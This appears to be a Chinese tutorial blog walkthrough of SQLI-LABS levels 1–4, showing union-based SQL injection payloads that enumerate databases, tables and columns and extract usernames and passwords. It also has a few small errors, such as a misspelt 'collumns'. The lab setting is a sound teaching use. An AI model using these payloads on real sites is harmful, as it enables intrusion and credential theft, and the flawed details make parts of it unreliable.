SQLI-LABS（二）

SQLI-LABS（二）
前四关流程：
1、判断是否存在sql注入漏洞
2、使用order by 查看列数
3、使用联合查询判断回显位置
4、在回显位置处注入sql语句进行查询

**我们可以在sql文件中每一关文件中的index.php中写入代码
echo $sql;
echo “< br >”;
以方便做题时查看sql语句；

Less-1：
**
1、判断：?id=1’
在这里插入图片描述
出现报错，证明存在sql漏洞，其中
报错信息为’‘1’’ LIMIT 0,1’ at line 1
sql语句为SELECT * FROM users WHERE id=‘1’’ LIMIT 0,1
知以’闭合参数；

2、列数：?id=1’ order by x–+ (其中x输入数字代表哪一列，是用二分法缩小范围,x之后是两个减号与加号，代表注释），本题查询为列有1，2，3；

在这里插入图片描述

3、判断回显位置：?id=0’ union select 1,2,3–+ ，本题判断回显位置为2和3的位置（之后的注入语句均在这两个位置上，即替换2和3）；

在这里插入图片描述

4、查询数据库：?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+

在这里插入图片描述

5、查询某一个库（以security为例）中的表名：?id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3–+

在这里插入图片描述

6、查security中users中的列：?id=0’ union select 1,(select group_concat( column_name) from information_schema.collumns where table_name=‘users’),3–+

在这里插入图片描述

7、具体查users中的username和password:?id=0’ union select 1,(select group_concat(concat_ws(’~’,username,password))from security.users),3–+

在这里插入图片描述
常用函数：
system_user()
user()
current_user()
databases()
version()
@@datadir 查看安装路径
@@version_compile_os 查看操作系统
group_concat() 将所有数据拼接为一行进行显示只可limit 0,1
concat_ws(’~’,A,B) A,B为想要查看的内容，此函数表示将数据A与B用~对应起来

语句分析：
1、select * from users limit x,y;
–> x,y均为数字，其中x表示从第x+1个开始列出， y表示显示几个数据
2、select * from users where id=x;
–>x为数字，表示显示id为x的数据
3、select * from users order by x;
–>x为数字，表示数据按照第x列顺序排出(数字顺序/字母顺序）

Less-2：
1、判断：
?id=1

在这里插入图片描述

未报错，sql语句正确，得知为整数时正确

?id=1’

在这里插入图片描述
出现报错，证明存在sql漏洞，其中
报错信息为 ‘’ LIMIT 0,1’ at line 1
sql语句为 SELECT * FROM users WHERE id=1’ LIMIT 0,1
得知为整型注入

之后的操作只需将第一关中的单引号去掉即可

Less-3：
1、判断：
?id=1
在这里插入图片描述
在这里插入图片描述

为报错，sql语句正确，得知闭合参数为‘）

?id=1’
在这里插入图片描述
出现报错，证明存在sql漏洞，其中
报错信息为 ‘‘1’’) LIMIT 0,1’ at line 1
sql语句为 SELECT * FROM users WHERE id=(‘1’’) LIMIT 0,1
得知闭合参数为’)
之后的操作只需将第一关中的单引号改为’)即可

Less-4：
1、判断：
?id=1

在这里插入图片描述

在这里插入图片描述
未报错，sql语句正确，得知闭合参数为")

?id=1’

在这里插入图片描述

?id=1" （此处是双引号）

在这里插入图片描述
出现报错，存在sql注入漏洞，其中
报错信息为 ‘“1"”) LIMIT 0,1’ at line 1
sql语句为 SELECT * FROM users WHERE id=(“1"”) LIMIT 0,1
得知闭合参数为")

之后的操作只需将第一关中单引号改为双引号加一个括号即可

注意 : 所有的符号均是在英文状态下的，文本中有些地方copy过来就成了这个样子，望体谅。

今天的内容就到这里啦，祝大家学习愉快！

SQLI-LABS（二）相关推荐

SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
【less-24】基于SQLI的二次注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理二次排序注入思路: 实验步骤第一步在kali平台上使用Firefox访问SQLI的 ...
sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录一.功能分析二 ...
SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注
第25a关是数值型注入: 后台过滤了关键字(and.or),可以双写绕过: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. SQLi-LABS 其余关卡,可以参考我的专栏:SQLi-LABS ...
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
SQLi LABS Less 16 布尔盲注
第十六关是双引号+括号的字符型注入,推荐使用布尔盲注一.功能分析一个简单的登录功能,输入用户名和密码点击登录,后台接收参数查询数据库. 如果用户名和密码存在,页面提示登录成功. 如果用户名和密码不 ...

SQLI-LABS（二）

SQLI-LABS（二）相关推荐

最新文章

热门文章